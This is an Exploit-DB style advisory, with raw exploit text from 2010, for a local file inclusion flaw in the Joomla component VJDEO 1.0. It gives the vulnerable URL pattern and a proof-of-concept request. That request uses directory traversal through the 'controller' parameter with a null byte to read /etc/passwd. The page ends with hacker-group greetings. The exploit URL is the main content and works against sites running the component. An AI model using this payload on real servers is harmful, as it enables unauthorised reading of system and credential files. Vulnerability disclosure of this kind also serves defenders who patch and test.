Joomla Component VJDEO 1.0 LFI Vulnerability

vendor:

Joomla Component VJDEO 1.0

by:

Angela Zhang

N/A

CVSS

N/A

LFI

CWE

Product Name: Joomla Component VJDEO 1.0

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2010

Joomla Component VJDEO 1.0 LFI Vulnerability

The Joomla Component VJDEO 1.0 is vulnerable to a Local File Inclusion (LFI) exploit. By manipulating the 'controller' parameter in the index.php file, an attacker can access sensitive system files, such as /etc/passwd.

Mitigation:

Unknown

Source

Exploit-DB raw data:

(o)=====================================================================================(o)

                              Joomla Component VJDEO 1.0 LFI Vulnerability


                Vendor   : http://www.joomla.ternaria.com/
                Author    : Angela Zhang
                Contact  : mizz_4ng3l@yahoo.com
                Date        :  07 - April - 2010

(o)======================================================================================(o)



     [o] Exploit
 
       http://localhost/[path]/index.php?option=com_vjdeo&controller=[LFI]
 
 
    [o] PoC
 
       http://localhost/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00



(o)===========================================================================================(o)

Greetz   :   -:-  3SomeCrew  -:-

     Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf ,   home_edition2001   ,   mywisdom , s4va, 
     Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk
     


(o)===========================================================================================(o)